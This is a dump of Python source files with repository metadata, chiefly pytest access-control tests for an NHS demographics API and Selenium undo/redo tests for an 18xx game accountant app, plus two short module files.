| 0
| 0
| 0
| 0
|
0
| 8
|
7ddc44ecd5853c704ed9413854b10813fa29f63f
| 7,748
|
py
|
Python
|
tests/functional/test_patient_access.py
|
harryhmc/personal-demographics-service-api
|
33b427284aab58fbecea6fd9d74dfd7ecfbf1831
|
[
"MIT"
] | null | null | null |
tests/functional/test_patient_access.py
|
harryhmc/personal-demographics-service-api
|
33b427284aab58fbecea6fd9d74dfd7ecfbf1831
|
[
"MIT"
] | null | null | null |
tests/functional/test_patient_access.py
|
harryhmc/personal-demographics-service-api
|
33b427284aab58fbecea6fd9d74dfd7ecfbf1831
|
[
"MIT"
] | null | null | null |
from tests.functional.config_files import config
import requests
import uuid
import pytest
@pytest.mark.asyncio
class TestUserRestrictedPatientAccess:
async def test_patient_access_retrieve_happy_path(
self, nhs_login_token_exchange
):
token = await nhs_login_token_exchange()
headers = {
"NHSD-SESSION-URID": "123",
"Authorization": "Bearer " + token,
"X-Request-ID": str(uuid.uuid4()),
}
r = requests.get(
f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/9912003071",
headers=headers,
)
assert r.status_code == 200
async def test_patient_access_retrieve_non_matching_nhs_number(
self, nhs_login_token_exchange
):
token = await nhs_login_token_exchange()
headers = {
"NHSD-SESSION-URID": "123",
"Authorization": "Bearer " + token,
"X-Request-ID": str(uuid.uuid4()),
}
r = requests.get(
f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/123456789",
headers=headers,
)
body = r.json()
assert r.status_code == 403
assert body["issue"][0]["details"]["coding"][0]["code"] == "ACCESS_DENIED"
assert (
body["issue"][0]["details"]["coding"][0]["display"]
== "Patient cannot perform this action"
)
async def test_patient_access_retrieve_incorrect_path(
self, nhs_login_token_exchange
):
token = await nhs_login_token_exchange()
headers = {
"NHSD-SESSION-URID": "123",
"Authorization": "Bearer " + token,
"X-Request-ID": str(uuid.uuid4()),
}
r = requests.get(
f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient?family=Smith&gender=female&birthdate=eq2010-10-22",
headers=headers,
)
body = r.json()
assert r.status_code == 403
assert body["issue"][0]["details"]["coding"][0]["code"] == "ACCESS_DENIED"
assert (
body["issue"][0]["details"]["coding"][0]["display"]
== "Patient cannot perform this action"
)
async def test_patient_access_update_happy_path(
self, nhs_login_token_exchange, create_random_date
):
token = await nhs_login_token_exchange()
date = create_random_date
patch_body = {
"patches": [{"op": "replace", "path": "/birthDate", "value": date}]
}
headers = {
"NHSD-SESSION-URID": "123",
"Authorization": "Bearer " + token,
"X-Request-ID": str(uuid.uuid4()),
}
r = requests.get(
f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/9912003071",
headers=headers,
)
Etag = r.headers["Etag"]
versionId = r.json()["meta"]["versionId"]
headers = {
"NHSD-SESSION-URID": "123",
"Authorization": "Bearer " + token,
"X-Request-ID": str(uuid.uuid4()),
"If-Match": Etag,
"Content-Type": "application/json-patch+json",
}
r = requests.patch(
f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/9912003071",
headers=headers,
json=patch_body,
)
assert r.status_code == 200
assert int(r.json()["meta"]["versionId"]) == int(versionId) + 1
async def test_patient_access_update_non_matching_nhs_number(
self, nhs_login_token_exchange, create_random_date
):
token = await nhs_login_token_exchange()
date = create_random_date
patch_body = {
"patches": [{"op": "replace", "path": "/birthDate", "value": date}]
}
headers = {
"NHSD-SESSION-URID": "123",
"Authorization": "Bearer " + token,
"X-Request-ID": str(uuid.uuid4()),
}
r = requests.get(
f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/9912003071",
headers=headers,
)
Etag = r.headers["Etag"]
headers = {
"NHSD-SESSION-URID": "123",
"Authorization": "Bearer " + token,
"X-Request-ID": str(uuid.uuid4()),
"If-Match": Etag,
"Content-Type": "application/json-patch+json",
}
r = requests.patch(
f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/123456789",
headers=headers,
json=patch_body,
)
body = r.json()
assert r.status_code == 403
assert body["issue"][0]["details"]["coding"][0]["code"] == "ACCESS_DENIED"
assert (
body["issue"][0]["details"]["coding"][0]["display"]
== "Patient cannot perform this action"
)
async def test_patient_access_update_incorrect_path(
self, nhs_login_token_exchange, create_random_date
):
token = await nhs_login_token_exchange()
date = create_random_date
patch_body = {
"patches": [{"op": "replace", "path": "/birthDate", "value": date}]
}
headers = {
"NHSD-SESSION-URID": "123",
"Authorization": "Bearer " + token,
"X-Request-ID": str(uuid.uuid4()),
}
r = requests.get(
f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/9912003071",
headers=headers,
)
Etag = r.headers["Etag"]
headers = {
"NHSD-SESSION-URID": "123",
"Authorization": "Bearer " + token,
"X-Request-ID": str(uuid.uuid4()),
"If-Match": Etag,
"Content-Type": "application/json-patch+json",
}
r = requests.patch(
f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient?family=Smith&gender=female&birthdate=eq2010-10-22",
headers=headers,
json=patch_body,
)
body = r.json()
assert r.status_code == 403
assert body["issue"][0]["details"]["coding"][0]["code"] == "ACCESS_DENIED"
assert (
body["issue"][0]["details"]["coding"][0]["display"]
== "Patient cannot perform this action"
)
async def test_patient_access_retrieve_P5_scope(
self, nhs_login_token_exchange
):
token = await nhs_login_token_exchange(scope="P5")
headers = {
"NHSD-SESSION-URID": "123",
"Authorization": "Bearer " + token,
"X-Request-ID": str(uuid.uuid4()),
}
r = requests.get(
f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/9912003071",
headers=headers,
)
body = r.json()
assert r.status_code == 403
assert body["issue"][0]["details"]["coding"][0]["code"] == "ACCESS_DENIED"
assert (
body["issue"][0]["details"]["coding"][0]["display"]
== "Patient cannot perform this action"
)
async def test_patient_access_retrieve_P0_scope(
self, nhs_login_token_exchange
):
token = await nhs_login_token_exchange(scope="P0")
headers = {
"NHSD-SESSION-URID": "123",
"Authorization": "Bearer " + token,
"X-Request-ID": str(uuid.uuid4()),
}
r = requests.get(
f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/9912003071",
headers=headers,
)
body = r.json()
assert r.status_code == 403
assert body["issue"][0]["details"]["coding"][0]["code"] == "ACCESS_DENIED"
assert (
body["issue"][0]["details"]["coding"][0]["display"]
== "Patient cannot perform this action"
)
| 31.116466
| 114
| 0.542463
| 817
| 7,748
| 4.95104
| 0.119951
| 0.031644
| 0.051422
| 0.083066
| 0.949073
| 0.93597
| 0.91199
| 0.905068
| 0.905068
| 0.895179
| 0
| 0.03769
| 0.311693
| 7,748
| 248
| 115
| 31.241935
| 0.720795
| 0
| 0
| 0.763285
| 0
| 0.009662
| 0.277362
| 0.104027
| 0
| 0
| 0
| 0
| 0.101449
| 1
| 0
| false
| 0
| 0.019324
| 0
| 0.024155
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81716aaf00fa6507e0c88090e44327471ba8828c
| 25,079
|
py
|
Python
|
accountant/functional_tests/test_undo.py
|
XeryusTC/18xx-accountant
|
5dc70fb96042807ceaaadb51cea3108da4f40d85
|
[
"MIT"
] | null | null | null |
accountant/functional_tests/test_undo.py
|
XeryusTC/18xx-accountant
|
5dc70fb96042807ceaaadb51cea3108da4f40d85
|
[
"MIT"
] | 7
|
2017-03-29T18:52:44.000Z
|
2017-09-05T19:06:29.000Z
|
accountant/functional_tests/test_undo.py
|
XeryusTC/18xx-accountant
|
5dc70fb96042807ceaaadb51cea3108da4f40d85
|
[
"MIT"
] | 1
|
2019-12-16T22:27:07.000Z
|
2019-12-16T22:27:07.000Z
|
# -*- coding: utf-8 -*-
from .base import FunctionalTestCase
from .pages import game
DATE_REGEX = r'\[\d{1,2}-\d{1,2} \d{2}:\d{2}\] '
class UndoTests(FunctionalTestCase):
def test_can_undo_player_transfering_money_to_bank(self):
self.story('Alice is a user who has a game with a player')
self.browser.get(self.server_url)
homepage = game.Homepage(self.browser)
homepage.bank_cash.clear()
homepage.bank_cash.send_keys('1000\n')
game_uuid = self.browser.current_url[-36:]
self.create_player(game_uuid, 'Alice', cash=100)
self.story('Alice transfers some money to the bank')
game_page = game.GamePage(self.browser)
game_page.reload_game.click()
transfer_form = game.TransferForm(self.browser)
alice = game_page.get_players()[0]
alice['row'].click()
transfer_form.amount.send_keys('50\n')
alice = game_page.get_players()[0]
self.assertEqual(game_page.bank_cash.text, '1050')
self.assertEqual(alice['cash'].text, '50')
self.assertEqual(len(game_page.log), 2)
self.assertRegex(game_page.log[0].text,
DATE_REGEX + 'Alice transfered 50 to the bank')
self.story('There is an undo button, once it is clicked the game is '
'reverted to the previous state')
game_page.undo.click()
alice = game_page.get_players()[0] # Get DOM updates
self.assertEqual(game_page.bank_cash.text, '1000')
self.assertEqual(alice['cash'].text, '100')
self.assertEqual(len(game_page.log), 1)
self.story('There is also a redo button, when that is clicked the '
'transfer happens again')
game_page.redo.click()
alice = game_page.get_players()[0] # Get DOM updates
self.assertEqual(game_page.bank_cash.text, '1050')
self.assertEqual(alice['cash'].text, '50')
self.assertEqual(len(game_page.log), 2)
self.assertRegex(game_page.log[0].text,
DATE_REGEX + 'Alice transfered 50 to the bank')
def test_can_undo_company_transfering_money_to_bank(self):
self.story('Alice is a user who has a game with a company')
self.browser.get(self.server_url)
homepage = game.Homepage(self.browser)
homepage.start_button.click()
game_uuid = self.browser.current_url[-36:]
self.create_company(game_uuid, 'B&O', cash=1000)
self.story('The B&O transfers some money to the bank')
game_page = game.GamePage(self.browser)
game_page.reload_game.click()
transfer_form = game.TransferForm(self.browser)
bno = game_page.get_companies()[0]
bno['elem'].click()
transfer_form.amount.send_keys('30\n')
bno = game_page.get_companies()[0]
self.assertEqual(game_page.bank_cash.text, '12030')
self.assertEqual(bno['cash'].text, '970')
self.assertEqual(len(game_page.log), 2)
self.assertRegex(game_page.log[0].text,
DATE_REGEX + 'B&O transfered 30 to the bank')
self.story('Click the undo button, the game state is reverted')
game_page.undo.click()
bno = game_page.get_companies()[0]
self.assertEqual(game_page.bank_cash.text, '12000')
self.assertEqual(bno['cash'].text, '1000'),
self.assertEqual(len(game_page.log), 1)
self.story('Click the redo button, the transfer is done again')
game_page.redo.click()
bno = game_page.get_companies()[0]
self.assertEqual(game_page.bank_cash.text, '12030')
self.assertEqual(bno['cash'].text, '970')
self.assertEqual(len(game_page.log), 2)
self.assertRegex(game_page.log[0].text,
DATE_REGEX + 'B&O transfered 30 to the bank')
def test_can_undo_player_transfering_money_to_company(self):
self.story('Alice is a user who has a game')
self.browser.get(self.server_url)
homepage = game.Homepage(self.browser)
homepage.start_button.click()
game_uuid = self.browser.current_url[-36:]
self.create_player(game_uuid, 'Alice', cash=100)
self.create_company(game_uuid, 'B&O', cash=1000)
self.story('Alice transfers some money to the B&O')
game_page = game.GamePage(self.browser)
transfer_form = game.TransferForm(self.browser)
game_page.reload_game.click()
alice = game_page.get_players()[0]
alice['row'].click()
transfer_form.select_target('B&O')
transfer_form.amount.send_keys('40\n')
self.story('Verify transfer happened')
alice = game_page.get_players()[0]
bno = game_page.get_companies()[0]
self.verify_player(alice, cash=60)
self.verify_company(bno, cash=1040)
self.assertEqual(len(game_page.log), 2)
self.story('Click the undo button, the game state is reverted')
game_page.undo.click()
alice = game_page.get_players()[0]
bno = game_page.get_companies()[0]
self.verify_player(alice, cash=100)
self.verify_company(bno, cash=1000)
self.assertEqual(len(game_page.log), 1)
self.story('Click the redo button, the transfer is done again')
game_page.redo.click()
alice = game_page.get_players()[0]
bno = game_page.get_companies()[0]
self.verify_player(alice, cash=60)
self.verify_company(bno, cash=1040)
self.assertEqual(len(game_page.log), 2)
def test_can_undo_company_transfering_money_to_player(self):
self.story('Alice is a user who has a game')
self.browser.get(self.server_url)
homepage = game.Homepage(self.browser)
homepage.start_button.click()
game_uuid = self.browser.current_url[-36:]
self.create_player(game_uuid, 'Alice', cash=100)
self.create_company(game_uuid, 'B&O', cash=1000)
self.story('Alice transfers some money to the B&O')
game_page = game.GamePage(self.browser)
transfer_form = game.TransferForm(self.browser)
game_page.reload_game.click()
bno = game_page.get_companies()[0]
bno['elem'].click()
transfer_form.select_target('Alice')
transfer_form.amount.send_keys('20\n')
self.story('Verify transfer happened')
alice = game_page.get_players()[0]
bno = game_page.get_companies()[0]
self.verify_player(alice, cash=120)
self.verify_company(bno, cash=980)
self.assertEqual(len(game_page.log), 2)
self.story('Click the undo button, the game state is reverted')
game_page.undo.click()
alice = game_page.get_players()[0]
bno = game_page.get_companies()[0]
self.verify_player(alice, cash=100)
self.verify_company(bno, cash=1000)
self.assertEqual(len(game_page.log), 1)
self.story('Click the redo button, the transfer is done again')
game_page.redo.click()
alice = game_page.get_players()[0]
bno = game_page.get_companies()[0]
self.verify_player(alice, cash=120)
self.verify_company(bno, cash=980)
def test_can_undo_player_buying_share_from_ipo(self):
self.story('Alice is a user who has a game')
self.browser.get(self.server_url)
homepage = game.Homepage(self.browser)
homepage.start_button.click()
game_uuid = self.browser.current_url[-36:]
self.create_player(game_uuid, 'Alice', cash=100)
self.create_company(game_uuid, 'B&O', cash=0, ipo_shares=3)
self.story('Alice buys a share from the B&Os IPO')
game_page = game.GamePage(self.browser)
share_form = game.ShareForm(self.browser)
game_page.reload_game.click()
bno = game_page.get_companies()[0]
bno.set_value(10)
alice = game_page.get_players()[0]
alice['row'].click()
share_form.select_company('B&O')
share_form.select_source('ipo')
share_form.shares.clear()
share_form.shares.send_keys('2\n')
self.story('Verify that Alice bought the share')
bno = game_page.get_companies()[0]
alice = game_page.get_players()[0]
self.verify_player(alice, cash=80, shares=['B&O 20%'])
self.verify_company(bno, cash=0, ipo_shares=1, bank_shares=0)
self.assertEqual(game_page.bank_cash.text, '12020')
self.assertEqual(len(game_page.log), 2)
self.story('Click the undo button, the game state is reverted')
game_page.undo.click()
bno = game_page.get_companies()[0]
alice = game_page.get_players()[0]
self.verify_player(alice, cash=100, shares=[])
self.verify_company(bno, cash=0, ipo_shares=3, bank_shares=0)
self.assertEqual(game_page.bank_cash.text, '12000')
self.assertEqual(len(game_page.log), 1)
self.story('Click the redo button, the transfer is done again')
game_page.redo.click()
bno = game_page.get_companies()[0]
alice = game_page.get_players()[0]
self.verify_player(alice, cash=80, shares=['B&O 20%'])
self.verify_company(bno, cash=0, ipo_shares=1, bank_shares=0)
self.assertEqual(game_page.bank_cash.text, '12020')
self.assertEqual(len(game_page.log), 2)
def test_can_undo_company_buying_share_from_bank(self):
self.story('Alice is a user who has a game')
self.browser.get(self.server_url)
homepage = game.Homepage(self.browser)
homepage.start_button.click()
game_uuid = self.browser.current_url[-36:]
self.create_company(game_uuid, 'CPR', cash=0, bank_shares=5,
ipo_shares=5)
self.create_company(game_uuid, 'B&M', cash=100)
self.story('B&M buys a share of CPR from the bank')
game_page = game.GamePage(self.browser)
share_form = game.ShareForm(self.browser)
game_page.reload_game.click()
bm, cpr = game_page.get_companies()
cpr.set_value(20)
bm['elem'].click()
share_form.select_company('CPR')
share_form.select_source('bank')
share_form.shares.clear()
share_form.shares.send_keys('4\n')
self.story('Verify that shares have been bought')
bm, cpr = game_page.get_companies()
self.verify_company(cpr, cash=0, ipo_shares=5, bank_shares=1)
self.verify_company(bm, cash=20, shares=['CPR 40%'])
self.assertEqual(game_page.bank_cash.text, '12080')
self.assertEqual(len(game_page.log), 2)
self.story('Click the undo button, the game state is reverted')
game_page.undo.click()
bm, cpr = game_page.get_companies()
self.verify_company(cpr, cash=0, ipo_shares=5, bank_shares=5)
self.verify_company(bm, cash=100, shares=[])
self.assertEqual(game_page.bank_cash.text, '12000')
self.story('Click the redo button, the transfer is done again')
game_page.redo.click()
bm, cpr = game_page.get_companies()
self.verify_company(cpr, cash=0, ipo_shares=5, bank_shares=1)
self.verify_company(bm, cash=20, shares=['CPR 40%'])
self.assertEqual(game_page.bank_cash.text, '12080')
self.assertEqual(len(game_page.log), 2)
def test_can_undo_player_buying_share_from_company_treasury(self):
self.story('Alice is a user who has a game')
self.browser.get(self.server_url)
homepage = game.Homepage(self.browser)
homepage.start_button.click()
game_uuid = self.browser.current_url[-36:]
self.create_player(game_uuid, 'Alice', cash=300)
co_uuid = self.create_company(game_uuid, 'C&O', cash=0, bank_shares=0,
ipo_shares=0)
self.create_company_share(co_uuid, co_uuid, shares=10)
self.story('Alice buys a share C&O from the C&O')
game_page = game.GamePage(self.browser)
share_form = game.ShareForm(self.browser)
game_page.reload_game.click()
alice = game_page.get_players()[0]
co = game_page.get_companies()[0]
co.set_value(30)
alice['row'].click()
share_form.select_company('C&O')
share_form.select_source('C&O')
share_form.shares.clear()
share_form.shares.send_keys('6\n')
self.story('Verify that shares have been bought')
alice = game_page.get_players()[0]
co = game_page.get_companies()[0]
self.verify_player(alice, cash=120, shares=['C&O 60%'])
self.verify_company(co, cash=180, shares=['C&O 40%'])
self.story('Click the undo button, the game state is reverted')
game_page.undo.click()
alice = game_page.get_players()[0]
co = game_page.get_companies()[0]
self.verify_player(alice, cash=300, shares=[])
self.verify_company(co, cash=0, shares=['C&O 100%'])
self.story('Click the redo button, the transfer is done again')
game_page.redo.click()
alice = game_page.get_players()[0]
co = game_page.get_companies()[0]
self.verify_player(alice, cash=120, shares=['C&O 60%'])
self.verify_company(co, cash=180, shares=['C&O 40%'])
def test_can_undo_company_paying_dividends(self):
self.story('Alice is a user who has a game')
self.browser.get(self.server_url)
homepage = game.Homepage(self.browser)
homepage.start_button.click()
game_uuid = self.browser.current_url[-36:]
alice_uuid = self.create_player(game_uuid, 'Alice', cash=0)
bob_uuid = self.create_player(game_uuid, 'Bob', cash=0)
bo_uuid = self.create_company(game_uuid, 'B&O', cash=0, bank_shares=0,
ipo_shares=2)
self.create_company_share(bo_uuid, bo_uuid, shares=1)
self.create_player_share(alice_uuid, bo_uuid, shares=4)
self.create_player_share(bob_uuid, bo_uuid, shares=3)
self.story('The B&O operates and pays dividends')
game_page = game.GamePage(self.browser)
operate_form = game.OperateForm(self.browser)
game_page.reload_game.click()
bo = game_page.get_companies()[0]
bo['elem'].click()
operate_form.revenue.clear()
operate_form.revenue.send_keys('80')
operate_form.full.click()
self.story('Verify that everyone has received money')
alice, bob = game_page.get_players()
bo = game_page.get_companies()[0]
self.verify_player(alice, cash=32)
self.verify_player(bob, cash=24)
self.verify_company(bo, cash=8)
self.assertEqual(game_page.bank_cash.text, '11936')
self.story('Click the undo button, the game state is reverted')
game_page.undo.click()
alice, bob = game_page.get_players()
bo = game_page.get_companies()[0]
self.verify_player(alice, cash=0)
self.verify_player(bob, cash=0)
self.verify_company(bo, cash=0)
self.assertEqual(game_page.bank_cash.text, '12000')
self.story('Click the redo button, the operation is done again')
game_page.redo.click()
alice, bob = game_page.get_players()
bo = game_page.get_companies()[0]
self.verify_player(alice, cash=32)
self.verify_player(bob, cash=24)
self.verify_company(bo, cash=8)
self.assertEqual(game_page.bank_cash.text, '11936')
def test_can_undo_company_withholding_dividends(self):
self.story('Alice is a user who has a game')
self.browser.get(self.server_url)
homepage = game.Homepage(self.browser)
homepage.start_button.click()
game_uuid = self.browser.current_url[-36:]
alice_uuid = self.create_player(game_uuid, 'Alice', cash=0)
bob_uuid = self.create_player(game_uuid, 'Bob', cash=0)
bo_uuid = self.create_company(game_uuid, 'B&O', cash=0, bank_shares=0,
ipo_shares=2)
self.create_company_share(bo_uuid, bo_uuid, shares=1)
self.create_player_share(alice_uuid, bo_uuid, shares=4)
self.create_player_share(bob_uuid, bo_uuid, shares=3)
self.story('The B&O operates and withholds dividends')
game_page = game.GamePage(self.browser)
operate_form = game.OperateForm(self.browser)
game_page.reload_game.click()
bo = game_page.get_companies()[0]
bo['elem'].click()
operate_form.revenue.clear()
operate_form.revenue.send_keys('90')
operate_form.withhold.click()
self.story('Verify that only the B&O has received money')
alice, bob = game_page.get_players()
bo = game_page.get_companies()[0]
self.verify_player(alice, cash=0)
self.verify_player(bob, cash=0)
self.verify_company(bo, cash=90)
self.assertEqual(game_page.bank_cash.text, '11910')
self.story('Click the undo button, the game state is reverted')
game_page.undo.click()
alice, bob = game_page.get_players()
bo = game_page.get_companies()[0]
self.verify_player(alice, cash=0)
self.verify_player(bob, cash=0)
self.verify_company(bo, cash=0)
self.assertEqual(game_page.bank_cash.text, '12000')
self.story('Click the redo button, the withholding is done again')
game_page.redo.click()
alice, bob = game_page.get_players()
bo = game_page.get_companies()[0]
self.verify_player(alice, cash=0)
self.verify_player(bob, cash=0)
self.verify_company(bo, cash=90)
self.assertEqual(game_page.bank_cash.text, '11910')
def test_can_undo_company_paying_half_dividends(self):
self.story('Alice is a user who has a game')
self.browser.get(self.server_url)
homepage = game.Homepage(self.browser)
homepage.start_button.click()
game_uuid = self.browser.current_url[-36:]
alice_uuid = self.create_player(game_uuid, 'Alice', cash=0)
bob_uuid = self.create_player(game_uuid, 'Bob', cash=0)
bo_uuid = self.create_company(game_uuid, 'B&O', cash=0, bank_shares=0,
ipo_shares=2)
self.create_company_share(bo_uuid, bo_uuid, shares=1)
self.create_player_share(alice_uuid, bo_uuid, shares=4)
self.create_player_share(bob_uuid, bo_uuid, shares=3)
self.story('The B&O operates and pays half dividends')
game_page = game.GamePage(self.browser)
operate_form = game.OperateForm(self.browser)
game_page.reload_game.click()
bo = game_page.get_companies()[0]
bo['elem'].click()
operate_form.revenue.clear()
operate_form.revenue.send_keys('100')
operate_form.half.click()
self.story('Verify that everyone received the correct amounts')
alice, bob = game_page.get_players()
bo = game_page.get_companies()[0]
self.verify_player(alice, cash=20)
self.verify_player(bob, cash=15)
self.verify_company(bo, cash=55)
self.assertEqual(game_page.bank_cash.text, '11910')
self.story('Click the undo button, the game state is reverted')
game_page.undo.click()
alice, bob = game_page.get_players()
bo = game_page.get_companies()[0]
self.verify_player(alice, cash=0)
self.verify_player(bob, cash=0)
self.verify_company(bo, cash=0)
self.assertEqual(game_page.bank_cash.text, '12000')
self.story('Click the redo button, the split payment is done again')
game_page.redo.click()
alice, bob = game_page.get_players()
bo = game_page.get_companies()[0]
self.verify_player(alice, cash=20)
self.verify_player(bob, cash=15)
self.verify_company(bo, cash=55)
self.assertEqual(game_page.bank_cash.text, '11910')
def test_log_does_not_show_undone_log_actions(self):
self.story('Alice is a user who has a game with a player')
self.browser.get(self.server_url)
homepage = game.Homepage(self.browser)
homepage.start_button.click()
game_uuid = self.browser.current_url[-36:]
self.create_player(game_uuid, 'Alice', cash=100)
self.story('Alice transfers some money to the bank')
game_page = game.GamePage(self.browser)
game_page.reload_game.click()
transfer_form = game.TransferForm(self.browser)
alice = game_page.get_players()[0]
alice['row'].click()
transfer_form.amount.send_keys('50\n')
self.assertEqual(len(game_page.log), 2)
self.assertRegex(game_page.log[0].text,
DATE_REGEX + 'Alice transfered 50 to the bank')
self.story('Click the undo button, an item is removed from the log')
game_page.undo.click()
self.assertEqual(len(game_page.log), 1)
self.assertRegex(game_page.log[0].text,
DATE_REGEX + 'New game started')
self.story('Soft reload the page, the undone item is still not shown')
game_page.reload_game.click()
self.assertEqual(len(game_page.log), 1)
self.assertRegex(game_page.log[0].text,
DATE_REGEX + 'New game started')
self.story('Hard refresh the page, the undone item is still not shown')
self.browser.refresh()
self.assertEqual(len(game_page.log), 1)
self.assertRegex(game_page.log[0].text,
DATE_REGEX + 'New game started')
self.story('Click the redo button, the undone item is shown again')
game_page.redo.click()
self.assertEqual(len(game_page.log), 2)
self.assertRegex(game_page.log[0].text,
DATE_REGEX + 'Alice transfered 50 to the bank')
self.story('Soft reload the page, the item is still there')
game_page.reload_game.click()
self.assertEqual(len(game_page.log), 2)
self.assertRegex(game_page.log[0].text,
DATE_REGEX + 'Alice transfered 50 to the bank')
self.story('Hard refresh the page, the item is still visible')
self.browser.refresh()
self.assertEqual(len(game_page.log), 2)
self.assertRegex(game_page.log[0].text,
DATE_REGEX + 'Alice transfered 50 to the bank')
def test_undo_button_disabled_when_action_cant_be_undone(self):
self.story('Alice is a user who has a game')
self.browser.get(self.server_url)
homepage = game.Homepage(self.browser)
homepage.start_button.click()
self.story("The game creating can't be undone")
game_page = game.GamePage(self.browser)
self.assertFalse(game_page.undo.is_enabled())
self.story("Can't undo player creation")
game_page.add_player_link.click()
add_player = game.AddPlayerPage(self.browser)
add_player.name.send_keys('Alice\n')
self.assertFalse(game_page.undo.is_enabled())
self.story("Can't undo company creation")
game_page.add_company_link.click()
add_company = game.AddCompanyPage(self.browser)
add_company.name.send_keys('B&M\n')
self.assertFalse(game_page.undo.is_enabled())
self.story("Can't undo editing a company")
bm = game_page.get_companies()[0]
bm['elem'].click()
bm['edit'].click()
edit_company = game.EditCompanyPage(self.browser)
edit_company.name.clear()
edit_company.name.send_keys('CPR\n')
self.assertFalse(game_page.undo.is_enabled())
def test_undone_actions_not_in_log_after_doing_new_action(self):
self.story('Alice is a user who has a game')
self.browser.get(self.server_url)
homepage = game.Homepage(self.browser)
homepage.start_button.click()
game_uuid = self.browser.current_url[-36:]
self.create_player(game_uuid, 'Alice', cash=100)
self.create_player(game_uuid, 'Bob', cash=100)
self.story('Alice transfers some money to the bank')
game_page = game.GamePage(self.browser)
game_page.reload_game.click()
transfer_form = game.TransferForm(self.browser)
alice, bob = game_page.get_players()
alice['row'].click()
transfer_form.amount.send_keys('60\n')
self.story('The transfer action has been done')
self.assertEqual(len(game_page.log), 2)
self.story('Undo the transfer action because Bob was meant to do it')
game_page.undo.click()
alice, bob = game_page.get_players()
bob['row'].click()
transfer_form.amount.send_keys('60\n')
self.story("Alice's action doesn't show in the log")
self.assertRegex(game_page.log[1].text,
DATE_REGEX + 'New game started')
self.assertRegex(game_page.log[0].text,
DATE_REGEX + 'Bob transfered 60 to the bank')
self.assertEqual(len(game_page.log), 2)
self.story("After soft refresh it still doesn't show")
game_page.reload_game.click()
self.assertRegex(game_page.log[1].text,
DATE_REGEX + 'New game started')
self.assertRegex(game_page.log[0].text,
DATE_REGEX + 'Bob transfered 60 to the bank')
self.assertEqual(len(game_page.log), 2)
| 43.017153
| 79
| 0.649029
| 3,551
| 25,079
| 4.384117
| 0.059983
| 0.095581
| 0.047341
| 0.046249
| 0.905768
| 0.882965
| 0.862089
| 0.848664
| 0.83222
| 0.802801
| 0
| 0.026618
| 0.230033
| 25,079
| 582
| 80
| 43.091065
| 0.779596
| 0.002113
| 0
| 0.794118
| 0
| 0.001961
| 0.146791
| 0
| 0
| 0
| 0
| 0
| 0.141176
| 1
| 0.02549
| false
| 0
| 0.003922
| 0
| 0.031373
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81a9c46d450b5f9db6796d8f2aa2104e32d556ab
| 265
|
py
|
Python
|
matilda/fundamental_analysis/equity_valuation_models/__init__.py
|
AlainDaccache/Quantropy
|
6cfa06ed2b764471382ebf94d40af867f10433bb
|
[
"MIT"
] | 45
|
2021-01-28T04:12:21.000Z
|
2022-02-24T13:15:50.000Z
|
matilda/fundamental_analysis/equity_valuation_models/__init__.py
|
AlainDaccache/Quantropy
|
6cfa06ed2b764471382ebf94d40af867f10433bb
|
[
"MIT"
] | 32
|
2021-03-02T18:45:16.000Z
|
2022-03-12T00:53:10.000Z
|
matilda/fundamental_analysis/equity_valuation_models/__init__.py
|
AlainDaccache/Quantropy
|
6cfa06ed2b764471382ebf94d40af867f10433bb
|
[
"MIT"
] | 10
|
2020-12-25T15:02:40.000Z
|
2021-12-30T11:40:15.000Z
|
from matilda.fundamental_analysis.equity_valuation_models.cost_of_capital import *
from matilda.fundamental_analysis.equity_valuation_models.absolute_valuation_modeling import *
from matilda.fundamental_analysis.equity_valuation_models.time_value_of_money import *
| 66.25
| 94
| 0.909434
| 34
| 265
| 6.617647
| 0.470588
| 0.146667
| 0.293333
| 0.4
| 0.733333
| 0.733333
| 0.733333
| 0.506667
| 0
| 0
| 0
| 0
| 0.045283
| 265
| 3
| 95
| 88.333333
| 0.889328
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
81b27c4a4da0cb91dc7b9304f5cde70b9a998fc0
| 58
|
py
|
Python
|
httpfaux/pytest_plugin.py
|
symonk/httpfaux
|
1b19f65a14656268a83488a14dd37b6ce78dc4d2
|
[
"Apache-2.0"
] | null | null | null |
httpfaux/pytest_plugin.py
|
symonk/httpfaux
|
1b19f65a14656268a83488a14dd37b6ce78dc4d2
|
[
"Apache-2.0"
] | null | null | null |
httpfaux/pytest_plugin.py
|
symonk/httpfaux
|
1b19f65a14656268a83488a14dd37b6ce78dc4d2
|
[
"Apache-2.0"
] | null | null | null |
from pytest import hookimpl
from pytest import hookimpl
| 11.6
| 27
| 0.827586
| 8
| 58
| 6
| 0.5
| 0.416667
| 0.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.172414
| 58
| 4
| 28
| 14.5
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
